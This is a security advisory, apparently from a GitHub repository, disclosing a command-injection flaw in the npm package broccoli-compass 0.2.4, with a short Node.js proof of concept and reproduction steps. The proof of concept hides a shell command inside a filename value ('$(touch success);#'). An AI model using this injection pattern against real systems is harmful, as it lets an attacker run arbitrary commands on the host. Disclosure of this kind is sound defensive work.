Skip to content
Permalink
9d65add2bc
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Vulnerability in broccoli-compass

This report details an ACI vulnerability affecting broccoli-compass@0.2.4.

Package source

Package description

"Sass-compass plugin for Broccoli"

Vulnerability Overview

Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).

If an attacker-controlled filename is included in the list of files passed to "broccoli-compass" via its "files" option, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.

This vulnerability is due to use of the child_process exec function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].

[1] https://cwe.mitre.org/data/definitions/77.html

[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback

Reproduction

A filename that contains a bash exploit payload must be provided in the list of files that "broccoli-compass" accepts as an argument. This can occur if another Node.js application includes "broccoli-compass" as a dependency and allows user-influenced filenames to reach the files list passed to "broccoli-compass".

The proof-of-concept (PoC) program below illustrates the issue. Executing this code will cause the command touch success to be executed, leading to the creation of a file called success.

var compileSass = require('broccoli-compass');
var user_provided_filename = '$(touch success);#';
compileSass({}, {
    'files': [user_provided_filename]
}).write('.', '.');

Environment: Node.js v15.5.1 on Linux

Steps to reproduce:

  1. npm i broccoli-compass@0.2.4
  2. Create a file, e.g., poc0.js, containing the PoC code.
  3. Execute the file: node poc0.js

A file called success will be created as a result of the execution of the PoC.